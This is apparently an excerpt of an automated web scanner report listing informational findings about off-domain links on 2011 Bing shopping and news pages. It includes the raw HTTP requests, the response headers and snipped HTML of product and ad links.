...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,226.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,228.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,230.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,232.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,234.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808523.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,236.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&amp;productkey=wlsearchnews&amp;P1=dsatnews&amp;P2=ozzy+osbourne+justin+bieber&amp;P3=0&amp;P4=msnhpm&amp;P5=F741A5D3C8544F77A0B57D8439E7E06E&amp;P6=Dallas%2c+Texas&amp;P7=Original&amp;P8=&amp;P9=32.8%2f-96.787&amp;P10=24902&amp;P11=&amp;P12=&amp;searchtype=News+Search&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%3a80%2fnews%2fsearch%3fq%3dozzy%2bosbourne%2bjustin%2bbieber%26FORM%3dFEEDTU" id="sb_feedback" onmousedown="return si_T('&amp;ID=FD,238.1')">Tell us what you think</a>
...[SNIP]...

22.387. http://www.bing.com/shopping

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /shopping?FORM=SHOPH2 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16331
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:10:00 GMT
Connection: close
Set-Cookie: _SS=SID=382AB2597B664F859F3B1F4ECDBE2E43; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:10:00 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c64c59991068646f1ac387638576bf31b; expires=Tue, 29-Jan-2013 17:10:00 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621030&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:10:00 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,30.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,32.1')">Hotmail</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,43.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,45.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,47.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,49.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,51.1')">About our ads</a>
...[SNIP]...

22.388. http://www.bing.com/shopping/bird-feeders/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/bird-feeders/search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /shopping/bird-feeders/search?q=squirrel-proof%20bird%20feeders&p1=%5bCommerceService%20scenario%3d%22f%22%20r%3d%22pricelow%7c10%2cpricehigh%7c25%2cleafcategoryid%7c5289%22%5d&vw=gr&FORM=SHOPH1&crea=012911feedersa HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:09:39 GMT
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=C5B30FDE5AF1459BB45DF470E55CE4D3; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:40 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c47521b9f211b4590b705c63c8b0cb105; expires=Tue, 29-Jan-2013 17:09:40 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:40 GMT; domain=.bing.com; path=/
Content-Length: 82892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,40.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,42.1')">Hotmail</a>
...[SNIP]...
<a href="/shopping/bird-shelter-squirrel-proof-feeder/p/85675473577E12C93FA9?q=squirrel-proof+bird+feeders&amp;FORM=EGCA0" onmousedown="return si_T('&amp;ID=commerce,20.1',this)"><img src="http://a2.bing4.com/getimage?q=big-29E4F1E83B80BF3F7300C6C566069AED&amp;wf=Comimage" title="Bird Shelter Squirrel Proof Feeder" alt="Bird Shelter Squirrel Proof Feeder" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
f="/shopping/perky-pet-5110pp-fortress-breakaway-squirrel-proof-bird-feeder/p/DC767814C827953F7AE7?q=squirrel-proof+bird+feeders&amp;FORM=EGCA1" onmousedown="return si_T('&amp;ID=commerce,24.1',this)"><img src="http://a3.bing4.com/getimage?q=big-F6B22D6A49F5360CA085D0C382B2277E&amp;wf=Comimage" title="Perky Pet 5110PP Fortress Breakaway Squirrel Proof Bird Feeder" alt="Perky Pet 5110PP Fortress Breakaway Squirrel Proof Bird Feeder" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
href="/shopping/6-lb-capacity-tall-tulip-lantern-bird-feeder-durable-powder/p/A92FB31D54D344EAAB56?q=squirrel-proof+bird+feeders&amp;FORM=EGCA2" onmousedown="return si_T('&amp;ID=commerce,27.1',this)"><img src="http://a4.bing4.com/getimage?q=big-75DE213847684422F7FA3F52D5828AB2&amp;wf=Comimage" title="6 LB Capacity, Tall Tulip Lantern Bird Feeder, Durable Powder ..." alt="6 LB Capacity, Tall Tulip Lantern Bird Feeder, Durable Powder ..." width="99" height="160" style="margin-top:2px;" /></a>
...[SNIP]...
<a href="/shopping/coropration-367-tulip-garden-latern/p/2F18342276957CF1F223?q=squirrel-proof+bird+feeders&amp;FORM=EGCA3" onmousedown="return si_T('&amp;ID=commerce,31.1',this)"><img src="http://a1.bing4.com/getimage?q=big-38D6CB84E7DAC03139A583E4910AA599&amp;wf=Comimage" title="Coropration 367 Tulip Garden Latern" alt="Coropration 367 Tulip Garden Latern" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<a href="/shopping/perky-pet-336-squirrel-be-gone-feeder/p/23118294C9EFE96A2331?q=squirrel-proof+bird+feeders&amp;FORM=EGCA4" onmousedown="return si_T('&amp;ID=commerce,35.1',this)"><img src="http://a2.bing4.com/getimage?q=big-D41AB8FB24362B3CD74E9592EF5279D2&amp;wf=Comimage" title="Perky Pet #336 Squirrel Be Gone Feeder" alt="Perky Pet #336 Squirrel Be Gone Feeder" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<a href="/shopping/5108-4-topflight-fortress-feeder/p/2DBC77C3824B1291ED4C?q=squirrel-proof+bird+feeders&amp;FORM=EGCA5" onmousedown="return si_T('&amp;ID=commerce,39.1',this)"><img src="http://a3.bing4.com/getimage?q=big-C6B68962FD6A9E067EFFD402274580F7&amp;wf=Comimage" title="5108-4 TopFlight Fortress Feeder" alt="5108-4 TopFlight Fortress Feeder" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<a href="/shopping/brome-1055-squirrel-buster-mini/p/BA7BB415E24D1A22182A?q=squirrel-proof+bird+feeders&amp;FORM=EGCA6" onmousedown="return si_T('&amp;ID=commerce,43.1',this)"><img src="http://a4.bing4.com/getimage?q=big-FC031E1B84612F4ED45AC1904BA9CBC3&amp;wf=Comimage" title="Brome 1055 Squirrel Buster Mini" alt="Brome 1055 Squirrel Buster Mini" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<a href="/shopping/perky-pet-368-5lb-sunflower-feeder/p/46F1958F27E86DC63B98?q=squirrel-proof+bird+feeders&amp;FORM=EGCA7" onmousedown="return si_T('&amp;ID=commerce,47.1',this)"><img src="http://a1.bing4.com/getimage?q=big-6A84F22DC94B850A376CCF9EBC02E7AE&amp;wf=Comimage" title="Perky Pet #368 5LB Sunflower Feeder" alt="Perky Pet #368 5LB Sunflower Feeder" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<a href="/shopping/gardman-wild-bird-ba01227-seed-master-glazed-feeder/p/3A86C82461CE631E5006?q=squirrel-proof+bird+feeders&amp;FORM=EGCA8" onmousedown="return si_T('&amp;ID=commerce,51.1',this)"><img src="http://a2.bing4.com/getimage?q=big-A2FE247771D1987141B6600757EBC51F&amp;wf=Comimage" title="Gardman Wild Bird BA01227 Seed Master Glazed Feeder" alt="Gardman Wild Bird BA01227 Seed Master Glazed Feeder" width="61" height="127" style="margin-top:19px;" /></a>
...[SNIP]...
<a href="/shopping/squirrel-proof-seed-feeder/p/4E78BEA13E799171A715?q=squirrel-proof+bird+feeders&amp;FORM=EGCA9" onmousedown="return si_T('&amp;ID=commerce,54.1',this)"><img src="http://a3.bing4.com/getimage?q=big-4070DAB7F9140FD344D403A3B4ACF0B6&amp;wf=Comimage" title="Squirrel Proof Seed Feeder" alt="Squirrel Proof Seed Feeder" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<a href="/shopping/woodlink-squirrel-proof-caged-port-tube-feeder/p/07F117FC48A7F6D85006?q=squirrel-proof+bird+feeders&amp;FORM=EGCA10" onmousedown="return si_T('&amp;ID=commerce,57.1',this)"><img src="http://a4.bing4.com/getimage?q=big-1523DC39946927A5D5222B2B81809BDF&amp;wf=Comimage" title="WoodLink Squirrel Proof Caged Port Tube Feeder" alt="WoodLink Squirrel Proof Caged Port Tube Feeder" width="160" height="160" style="margin-top:2px;" /></a>
...[SNIP]...
<a href="/shopping/squirrel-boss-bird-feeder/p/51FFE5276746421E5006?q=squirrel-proof+bird+feeders&amp;FORM=EGCA11" onmousedown="return si_T('&amp;ID=commerce,60.1',this)"><img src="http://a1.bing4.com/getimage?q=big-5D312B561F004F0CACE149C9B7B4FFB2&amp;wf=Comimage" title="Squirrel Boss Bird Feeder" alt="Squirrel Boss Bird Feeder" width="94" height="160" style="margin-top:2px;" /></a>
...[SNIP]...
href="/shopping/arundale-152-mandarin-wild-bird-feeder-with-seed-dividers/p/D9D7174D48284CE9FDD9?q=squirrel-proof+bird+feeders&amp;FORM=EGCA12" onmousedown="return si_T('&amp;ID=commerce,64.1',this)"><img src="http://a2.bing4.com/getimage?q=big-5A3B063AB9DC2DF8E670A0FCEF5DC172&amp;wf=Comimage" title="Arundale 152 Mandarin Wild Bird Feeder with Seed Dividers" alt="Arundale 152 Mandarin Wild Bird Feeder with Seed Dividers" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
sclkid=288EF148235E4DF397E616DBCBE9AB9B&amp;c=795646&amp;mu=http%3a%2f%2fwww.ecrater.com%2fp%2f3235916%2f3-pack-of-window-bird-feeders-squirrel" onmousedown="return si_T('&amp;ID=commerce,68.1',this)"><img src="http://a3.bing4.com/thumb/get?bid=osjTvyChikYM3w&amp;bn=CC&amp;fbid=95xJb3S%2fWTcG0A&amp;fbn=CC" title="3-pack Of Window Bird Feeders Squirrel Proof Window Bird Feeders" alt="3-pack Of Window Bird Feeders Squirrel Proof Window Bird Feeders" width="100" height="70" style="margin-top:47px;" /></a>
...[SNIP]...
msclkid=288EF148235E4DF397E616DBCBE9AB9B&amp;c=795646&amp;mu=http%3a%2f%2fwww.ecrater.com%2fp%2f3278385%2f2-pack-of-squirrel-proof-bird-feeders" onmousedown="return si_T('&amp;ID=commerce,71.1',this)"><img src="http://a4.bing4.com/thumb/get?bid=p9MxnzSdSWnuJA&amp;bn=CC&amp;fbid=95xJb3S%2fWTcG0A&amp;fbn=CC" title="2-pack Of Squirrel Proof Bird Feeders Great Gifts For Mom!" alt="2-pack Of Squirrel Proof Bird Feeders Great Gifts For Mom!" width="100" height="87" style="margin-top:39px;" /></a>
...[SNIP]...
B9B&amp;c=795443&amp;mu=http%3a%2f%2fwww.bonanza.com%2fbooths%2fSongbirdHaven%2fitems%2fBird_Feeder_the_Squirrel_Buster_Mini_by_Brome_Bird_Care" onmousedown="return si_T('&amp;ID=commerce,74.1',this)"><img src="http://a1.bing4.com/thumb/get?bid=jhKkKusCxZ0m2A&amp;bn=CC&amp;fbid=95xJb3S%2fWTcG0A&amp;fbn=CC" title="Bird Feeder the Squirrel Buster Mini by Brome Bird Care" alt="Bird Feeder the Squirrel Buster Mini by Brome Bird Care" width="69" height="100" style="margin-top:32px;" /></a>
...[SNIP]...
<h3><a href="http://717893.r.msn.com/?ld=4vxIte8l13iyKfl6BZ3jX5LboI9iFaFiGAtsnu_qh8i7k-nn3raWZiEc64cEWbSP6OB_U5VU83FqEtaIBaYJN6U9EIgum39oC5KlpXuQns5IAwKF-cJ7Ad7PGTMB2bHoItqu-A_bwwbdwuspPfOFQQ6u_ThKtEv_cIxmtfuFajG3cZVZ_yM-ekVhg4t2BlwTHT9C5Y3TaHTAIf6ks5_Qtzl62mJrhyo9Kc2iYFlmeoU4Q1VAlM_Y8gyCjK84SIP_uRUpL__xAmY3M9xNyeeqwAy2UyvEm-YV8KcibVR7QAp1ufUhuqS5G07xI" onmousedown="return si_T('&amp;ID=FD,58.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://1037183.r.redacted/?ld=4vj0g2T4LO0vTL9bpK4OMpYLG3ke-LZCgBpDmt50oReKfLzkJB9_zG2C8mfWrXbCnpIHkMbuJNvwdppjo489VSacTxf6QpXwM4KajBdh-tb86BuFCoKtEWzI--2U339O7oU3haa5aHl6aDi8zqvwq6Q3mQcAYWohIWd0P-CNt9RBUz0G5vKSc--ruGvESH7FJQgtYnUAeT-WA4Ojj5TRNNAVD6CRmdD-9ESlQXvaSvsTcxsbCI-_GKfDgUDrjTjgqReVwSRu0XZF1njPJkUHlRDk_kmz23CuiVrVM4gjZwUaMM8B1vZAb1FT7gOVqNj6Ut29DFqzM-x0i5fjOUPpa-CtDRnEpbmXHXAHQv759ZsoY1VAlMBVcgHQ_3jAGSwMJzYQ1kCBAmY3M9wULfRRa_lkSxz1KGHucTEhmF-mU6SiRUBEtxYMlVx-U" onmousedown="return si_T('&amp;ID=FD,60.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://397330.r.msn.com/?ld=4vAgwhprsVNfeAkpqyW4iIdDba8pjDzRPTHbjanHhoRcen_-oIOR5aE6_JM-SA9CuM2eX--K0b9IPYdxhjAuTeWXKAfI8cATtAuqeXD8Ckg0ZETKlNQBbADXOI0KFN0rOAe_IGctTeGVP8a8c5K_uOJtihT2tp7Ak9izCp7aJO-SxGK_SWGLX24u4Gu4FEQKOJSd0CrbY-e3_0FWlpd7RNxP6bdukweVseHOw2FJOlN4secc7giBDBbiluwOdoa_CYNVQJTAvl-8-_qkBLVFArxyCsLxAQJmNzPd_44F5egdKZMM1GS668yq5FNqrGhbMqwfTvrIkTpHJI" onmousedown="return si_T('&amp;ID=FD,62.1,Ads')">Buy Yankee Flipper..</a>
...[SNIP]...
<h3><a href="http://7531.r.msn.com/?ld=4vgLg_KN2uUVhwXNm1rhLw7UxMTCtTbLOtr8mysxtja6YOtMPieD8QIhRgy6VZsWY7l-hmESUZQSQwFfKhvttPoMNRYBq720smmSA6QTtcD0RTlxzhuoyv0J78T7JmIJ3mhdWArtxycXpLZWTRUxhXWmZMkusZzmzRVaNJtn_iNocsRd-NDte5dCaCx6f8-yE_1c6FNEDlFjY52NuvCRr4MLRx3T4RxbLeHfj1BAmoQg5J6HuxxZf8UNXlxZnb8JesNVQJTHJ_25mPHiAUqge1bayQIjcQJmNzPUDsm3U-RQldNe8-anEVT1IBzfl0LRsw5mFyEqUi3KXR" onmousedown="return si_T('&amp;ID=FD,64.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://559049.r.msn.com/?ld=4vWaFefffINvAVU4-bn6QSzNI9DIJhwFUsAr38H2TrBCRPTgJh7aSXHkxVFXhuVW5n8dLAXM2nB4yeIvu4wo47B5MCm_xHNdC70SsYP9WqB2eKrCwRmTwKGNpUSJQ43SK39dRcw9aY96ccGikUCGiI_Zbd3TiC_d7KU3Sq6NDNi6-hILgm6l34-7NUkHsPmmAzs82-lJx8T7U4eso0fMRFj12dtteirfryl6BdMGDEZaRH7BQbrGJDt6pUtDfzRzNb5CgwDt0maOBOzucft8jHXzVUCUw6DLQvbIhUnGoJLxzwPK1YECZjcz2JiI8K3HtxG_NtvWWhpJslPOq8C5l_NC5QBHgQ2dGAMg" onmousedown="return si_T('&amp;ID=FD,66.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://0.r.redacted/?ld=4vOvFsVfLls5GKKOXmD_kUwZ03gXx3yAMSP6uZnzBg6eR-8WySYYIn8CZ2lhOg_1fXhwgMG02QKYZyhIqdZ1MbdWnXCi86aOMThwftDSaS-9fD53ty-bNl9jD6qAk4RTb8U1ebdkkCJKLna8lqARIWKsaHbhyDPT60jgjbM76EK-vM41K5M430vgi04sqYPHcXUGX-ikmqf505PzVGgur6a1sT2MpStslAbZXPd6nT034yYi7Wsazn5fpptWKeJIxiLTtoJX_YpcJ6TcWPHx0Xeg1WFfH2A02dgppI13poh7Ze4MP3CduRB26W003JBNGI__rRukVNfjgEArp07XsxxGYIbPBQadjSlsE2tjc421gR-V1RCJpOa57TYpkdLuprWnYCYoas61rk54vHSQV5ZBHNMr01NMgPpWx08IP81ncAEOHz8ThJwnvAk19e0RtTNVQJTHiaC9vhM8AkattKUrjeCi0QJmNzPTcI21IJvGCTX1QUi1uApHSLBwhWMP5hLa4MBJ6Z1SNx" onmousedown="return si_T('&amp;ID=FD,68.1,Ads')">At Lowe's..</a>
...[SNIP]...
<h3><a href="http://700807.r.msn.com/?ld=4v6tppwqIfoUMsl9fzaUJUOG1SzzUPzYaMsfbDt6mwZUvqQOTyZbuiLkgefV90icM0t4CgJl_Zcqx0QnZ4-axkiF1x6VoZn-Mohyoq8dDzF4Eg2kFfj9qdHrWOFi-qMu6nQw8QZ6nT3-qGhp1mECwRB9HSZFRlc_9Hb12WSb8GSDSpz3lxTCiJvaLQI6NrVd1HNBptc2_GJqOUXNhH97GhiAP6XULagROiS5eQSflavRvyKtc-wBepugdCNtJ9R9oQNVQJTAOXYC4FgAeZQXkZxVGoHOEQJmNzPazFATLXNJkpCk8tD3UwkqXtjbJN0QkuNFi8Z7iuiUuL" onmousedown="return si_T('&amp;ID=FD,70.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://731936.r.msn.com/?ld=4vKOXhALU_i6EayRSIDZjx0zxyHVMT_KpQ4_QSqJ8HcF9j_lWqz_ETzmnrTSU2Ob3ofNi3QxNa2PxSOfidk6UacrDbWWQg8HtdYz-HWECQeNYNVvnSdYGk_JBwD89zXixom9dFZnZRUGnXM0k7Ln_rbNutLjAAp2cscjZzOQL-6lC4yTzfXdvE5yWaHGjeF1S_FRYUx_0vIA1ky-9jbX6AmPOK0rS2Qce46HKkXIIVNQQelVWSge_IANHZOmJJCl10B_g2ov4xLjpWDNuMsHlYePtNTjgDBTBj7SbJveg1hcg1VAlMbTsv_GO2OeAlOF4erVH8vhAmY3M99She7M1nrmTVN-n9TjwXZ2cmwkuP1upGxaw_GwWKkio" onmousedown="return si_T('&amp;ID=FD,72.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://0.r.redacted/?ld=4vhYz2p829p-yDSlc1rKcrHC3tWKbq9OcLe1noqBr9M8uDF2U859a3PzbtEG4ahyVNRty9v7lct9ewMfhfEn0pdkl7pWuyOrAc5YoGNrT0LIkNY2OkedmQ1j5yxr-x8cNXivnz_8Gnt1Zt1YALHEyZrry2Kz14dj3UzOt70ZLaJKns1aBzJGlEAHthFu5C5W4c_fer4Jpev4YUqU7mecjy1XVvnbQGahrDhb2r_yCJtufU7LFmaj6hUR9YFzkMilYdazUogkyoaE0k1k0wfJlCcvd8W8SJZ3hcZcHDkRZ9C7tSkzmc5EfPgCHrhPoNiI74NVQJTLXg51axKZbsgJzZpyo0LnsQJmNzPe4No5OwpD4gh5NMCib0VcBtf4geJd3upiSgG74-VOZq" onmousedown="return si_T('&amp;ID=FD,74.1,Ads')">Patio &amp; Garden at Amazon</a>
...[SNIP]...
<div><a href="http://advertising.microsoft.com/search/" class="sb_adMktA" onmousedown="return si_T('&amp;ID=FD,56.1,Ads')">See your message here</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,169.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,171.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,173.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,175.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,177.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808574.aspx?scrx=1&amp;market=en-US" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,179.1')">Help</a> | </li><li><a href="https://feedback.discoverbing.com/default.aspx?locale=en-US&amp;productkey=bingshopping&amp;P1=dsatcommerce&amp;P2=squirrel-proof%20bird%20feeders&amp;P3=0&amp;P4=SHOPH1&amp;P5=f741a5d3-c854-4f77-a0b5-7d8439e7e06e&amp;P6=&amp;P7=Original&amp;P8=&amp;P9=0.0/0.0&amp;P10=0.0&amp;P11=http%3a%2f%2fwww.bing.com%3a80%2fshopping%2fbird-feeders%2fsearch%3fq%3dsquirrel-proof%2520bird%2520feeders%26p1%3d%255bCommerceService%2520scenario%253d%2522f%2522%2520r%253d%2522pricelow%257c10%252cpricehigh%257c25%252cleafcategoryid%257c5289%2522%255d%26vw%3dgr%26FORM%3dSHOPH1%26crea%3d012911feedersa&amp;P12=&amp;searchtype=Commerce+Answer&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%2fshopping%2fbird-feeders%2fsearch%3fq%3dsquirrel-proof%2520bird%2520feeders%26p1%3d%255bCommerceService%2520scenario%253d%2522f%2522%2520r%253d%2522pricelow%257c10%252cpricehigh%257c25%252cleafcategoryid%257c5289%2522%255d%26FORM%3dFEEDTU" id="sb_feedback" onmousedown="return si_T('&amp;ID=FD,181.1')">Tell us what you think</a>
...[SNIP]...

22.389. http://www.bing.com/shopping/content/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/content/search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /shopping/content/search?q=Cocktail+Dresses%3a+Silk+Organza+Strapless+Dress&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_image_jl0125_1x1&gt1=36010 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 33458
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:49 GMT
Connection: close
Set-Cookie: JSESSIONID=701D1EF51F0C0EBBEFA7B584B767B7F3; Path=/shopping
Set-Cookie: _SS=SID=F7223D6786004ADAB84BB9BF5E3B5DE1; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:49 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c79fe60b3364d4636b00d1291b84352c7; expires=Tue, 29-Jan-2013 17:09:49 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:49 GMT; domain=.bing.com; path=/


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org
...[SNIP]...
</script>
   
       
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,57.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,59.1')">Hotmail</a>
...[SNIP]...
<strong><a xmlns="" tabindex="20" href="http://www.discoverbing.com/get/set-bing-as-your-homepage-2/?&form=SSMKHM">Find what you're looking for &amp; more. Make Bing your search engine.</a>
...[SNIP]...
<h3>
<a tabindex="70" href="http://www.bizrate.com/womens-dresses/silk-cocktail-dresses/">Silk cocktail dresses Women's Dresses at Bizrate - Shop online for ...</a>
...[SNIP]...
<li>
<a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=silk+cocktail+dresses&d=4636314282887850&mkt=en-US&w=3fc633d4,ba9f01b4">Cached page</a>
...[SNIP]...
<h3>
<a tabindex="70" href="http://clothing-and-accessories.become.com/cocktail-dress-silk">Cocktail Dress Silk - Compare Prices on Cocktail Dress Silk in the ...</a>
...[SNIP]...
<li>
<a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=silk+cocktail+dresses&d=4568303478309094&mkt=en-US&w=5e2b2b96,d0444ac7">Cached page</a>
...[SNIP]...
<h3>
<a tabindex="70" href="http://www.shopstyle.com/browse?fts=silk+cocktail+dress">Silk Cocktail Dress | Shop for Silk Cocktail Dress at ShopStyle</a>
...[SNIP]...
<li>
<a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=silk+cocktail+dresses&d=4987462216581666&mkt=en-US&w=476d4f7f,5b7db654">Cached page</a>
...[SNIP]...
</script>

<script src="http://adsyndication.redacted/delivery/getads.js"
   type="text/javascript">

   
</script>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,70.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
